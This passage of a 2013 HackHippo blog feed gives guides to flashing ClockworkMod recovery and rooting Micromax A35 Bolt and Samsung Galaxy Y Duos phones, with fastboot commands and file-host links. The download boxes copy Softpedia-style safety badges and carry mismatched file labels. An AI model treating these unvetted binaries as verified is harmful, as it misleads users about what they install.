&lt;b&gt;&lt;a href="http://share.cx.com/f7NygR" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/iyir7hvc0j3ozzc/RecoveryManager_v0.36b.apk" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="color: lime; font-size: large;"&gt;&lt;u&gt;Requirements:&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: lime;"&gt;&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"&gt;&lt;u&gt;&lt;b&gt;recovery.img&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/span&gt;&lt;span class="smalltext"&gt;&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/Cnpn4Y" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/cbyinvidbwqmv0m/recovery.img" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="font-size: medium; margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-size: medium;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-size: 9px;"&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-size: 9px;"&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-size: 9px;"&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-size: 9px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/span&gt;&lt;div&gt;
&lt;div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Instructions&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMunJhAJccgta8jWeVy29sf8icibO2E6thMI9bq-mObFP-w5XrXiYb-atsIE8YGVv4vroXFZIraE5x1XR68JE6IDtb_GScoQSt2N628-qUkspKDHmHGxHC-I5_1JjOsacuN6_WeR5pJi8/s1600/Micromax-A35-Bolt.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMunJhAJccgta8jWeVy29sf8icibO2E6thMI9bq-mObFP-w5XrXiYb-atsIE8YGVv4vroXFZIraE5x1XR68JE6IDtb_GScoQSt2N628-qUkspKDHmHGxHC-I5_1JjOsacuN6_WeR5pJi8/s1600/Micromax-A35-Bolt.jpg" height="297" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;1. Install recovery manager and open it.&lt;br /&gt;2. Provide superuser rights by clicking on allow.&lt;br /&gt;3. Click on recovery and further install recovery.&lt;br /&gt;4. Select the image file on recovery install popup and then confirm by clicking on OK.&lt;br /&gt;5. Phone will restart in recovery mode&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
Now there you have it Clockworkmod recovery flashed on your Micromax A35 Bolt&lt;span class="smalltext"&gt;&lt;span class="smalltext"&gt;&lt;span class="smalltext"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Procedure:&lt;/div&gt;
&lt;div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Copy the downloaded recovery.img to your ADB folder&lt;/li&gt;
&lt;li&gt;Turn off your phone&lt;/li&gt;
&lt;li&gt;Boot into fastboot mode by pressing power button and volume down keys together for sometime.&lt;/li&gt;
&lt;li&gt;After sometime when it gets stuck at the logo, connect your phone to PC using USB cable&lt;/li&gt;
&lt;li&gt;If you are in WinXP, open command prompt and browse to your ADB folder using cd commands.&lt;/li&gt;
&lt;li&gt;If you are in Windows7, right click in the ADB folder and click to open command prompt there.&lt;/li&gt;
&lt;li&gt;Type this in the command prompt :&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
Code: &amp;nbsp; fastboot devices&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;This should display your device name in fastboot mode, if nothing is shown, then you have to check previous steps again.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Type this command to flash CWM recovery to your phone&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Code: &amp;nbsp;fastboot flash recovery recovery.img&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;It will show the progress and completion dialogue within seconds when it finishes successfully.&lt;/li&gt;
&lt;li&gt;Now you can try if CWM is working.&lt;/li&gt;
&lt;li&gt;Remove battery of your phone and reinsert.&lt;/li&gt;
&lt;li&gt;Press Power and Volume Up key to boot into recovery mode.&lt;/li&gt;
&lt;li&gt;You should see CWM now, otherwise try flashing again&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Thats it!! Congrats&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/08/clockworkmod-recovery-on-micromax-a35.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMunJhAJccgta8jWeVy29sf8icibO2E6thMI9bq-mObFP-w5XrXiYb-atsIE8YGVv4vroXFZIraE5x1XR68JE6IDtb_GScoQSt2N628-qUkspKDHmHGxHC-I5_1JjOsacuN6_WeR5pJi8/s72-c/Micromax-A35-Bolt.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-351560654605044905</guid><pubDate>Fri, 16 Aug 2013 15:11:00 +0000</pubDate><atom:updated>2013-08-16T08:11:20.440-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Blogger</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><title>Root Micromax A35 Bolt</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
How to Root Micromax A35 Bolt&lt;/h2&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5UA-QnsT1OIotOoBPmVDsxLScYkZ-xjyAqAqAESZVu-pv9nm9dowMDlyYz8flD167l2kYUyBPhgGHjwkVj5ee3nRdxYRFOd7cPiw8BRzNAB35Lmpq5QL9zSAusX_rf_bkFDMg6dVl3Ro/s1600/Root-Micromax-A35-Bolt.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5UA-QnsT1OIotOoBPmVDsxLScYkZ-xjyAqAqAESZVu-pv9nm9dowMDlyYz8flD167l2kYUyBPhgGHjwkVj5ee3nRdxYRFOd7cPiw8BRzNAB35Lmpq5QL9zSAusX_rf_bkFDMg6dVl3Ro/s1600/Root-Micromax-A35-Bolt.jpg" height="298" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/h2&gt;
Steps For Rooting Micromax A35 Bolt :&lt;br /&gt;
&lt;br /&gt;
Step 1 : Download "Micromax A35 Bolt Root Tools (Bin4ry)" from above link &amp;amp; Extract ZIP file anywhere in your PC or Laptop.&lt;br /&gt;
&lt;br /&gt;
Step 2 : Enable USB Debugging on A35 Bolt (By Go to Settings&amp;gt;&amp;gt;Development&amp;gt;&amp;gt;USB debugging)&lt;br /&gt;
&lt;br /&gt;
Step 3 : Connect your a35 bolt with PC or Laptop &amp;amp; wait some time automatically drivers will installed to your PC or Laptop.&lt;br /&gt;
&lt;br /&gt;
Step 4 : Open the folder where you extracted "Micromax A35 Bolt Root Tools (Bin4ry)"&lt;br /&gt;
&lt;br /&gt;
Step 5 : Now open "Runme.bat" &amp;amp; Screen will comes with green letters.&lt;br /&gt;
&lt;br /&gt;
Step 6 : Enter 1 in that screen and then press Enter. (Make sure your Micromax A35 Bolt connected to PC or Laptop)&lt;br /&gt;
&lt;br /&gt;
Step 7 : Your Device will reboot and after that process Bin4ry copy roots file to device.&lt;br /&gt;
&lt;br /&gt;
Step 8 : After coping files device will Restart.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: lime; font-size: large;"&gt;&lt;u&gt;Requirements:&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: lime; font-size: large;"&gt;Micromax A35 Bolt Root Tools (Bin4ry)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/Cnpn4Y" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/i37fxxyxm89w8gd/root_with_restore_by_bin4ry_v30.zip" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: lime; font-size: large;"&gt;&lt;b&gt;Micromax A35 Bolt Driver&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/6QKdjr" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/txhbfedauqqaz79/MTK-USB-Driver_v1.0948.0.rar" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/08/root-micromax-a35-bolt.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5UA-QnsT1OIotOoBPmVDsxLScYkZ-xjyAqAqAESZVu-pv9nm9dowMDlyYz8flD167l2kYUyBPhgGHjwkVj5ee3nRdxYRFOd7cPiw8BRzNAB35Lmpq5QL9zSAusX_rf_bkFDMg6dVl3Ro/s72-c/Root-Micromax-A35-Bolt.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-2611894736280910954</guid><pubDate>Fri, 16 Aug 2013 13:56:00 +0000</pubDate><atom:updated>2013-08-16T08:20:18.633-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><title>Root Samsung Galaxy Y Duos GT-S6102</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5HnrzFtpSxUjh9VJ6EBkllubAXg9_mnCM8B9kem36gnPDAOTmDcX7VOWD-Ii2vGopwUyTUnFUqSBIPgEWbLfuZks4xtB4t_05sJdDSw06Bo4nIL4mk8afbZrlGBYQL4i71Tn3Vzqn8QA/s1600/root-samsung-galaxy-S6102.jpg" imageanchor="1" style="clear: right; display: inline !important; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5HnrzFtpSxUjh9VJ6EBkllubAXg9_mnCM8B9kem36gnPDAOTmDcX7VOWD-Ii2vGopwUyTUnFUqSBIPgEWbLfuZks4xtB4t_05sJdDSw06Bo4nIL4mk8afbZrlGBYQL4i71Tn3Vzqn8QA/s1600/root-samsung-galaxy-S6102.jpg" height="200" width="200" /&gt;&lt;/a&gt;&lt;b&gt;Root Samsung Galaxy Y Duos GT-S6102&lt;/b&gt;&lt;b&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;&lt;span style="color: lime; font-size: large;"&gt;Warning:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;Rooting can void warranty. Please be careful while executing these procedures.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;Required files:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;a href="https://www.cx.com/0/filedata/get/bqbEJwZ1EeOhsBIFOQ75wQ?download=true" rel="nofollow" target="_blank"&gt;CWM-6102.zip&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cx.com/0/filedata/get/a8-IygZ1EeO9ixIFOA-R7w?download=true" rel="nofollow" target="_blank"&gt;Rooted-6102.zip&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="color: lime;"&gt;CWM-6102.zip:&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" class="contentheadings" style="background-color: white; color: #5e5e5e; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td valign="top"&gt;&lt;table border="0" cellpadding="0" cellspacing="0" class="contentheadings" style="color: #5e5e5e; width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#F1F3F7" class="padding_tblr10px" style="padding: 10px;" valign="top"&gt;&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/4SJxR8" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/?516873rrjvgir4v" rel="nofollow" style="color: #0058bb;" target="_blank" title="HackHippo Secure Download (mediafire.com)"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: lime;"&gt;Rooted-6102.zip: &lt;/span&gt;&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" class="contentheadings" style="background-color: white; color: #5e5e5e; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td valign="top"&gt;&lt;table border="0" cellpadding="0" cellspacing="0" class="contentheadings" style="color: #5e5e5e; width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#F1F3F7" class="padding_tblr10px" style="padding: 10px;" valign="top"&gt;&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/4SJxR8" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
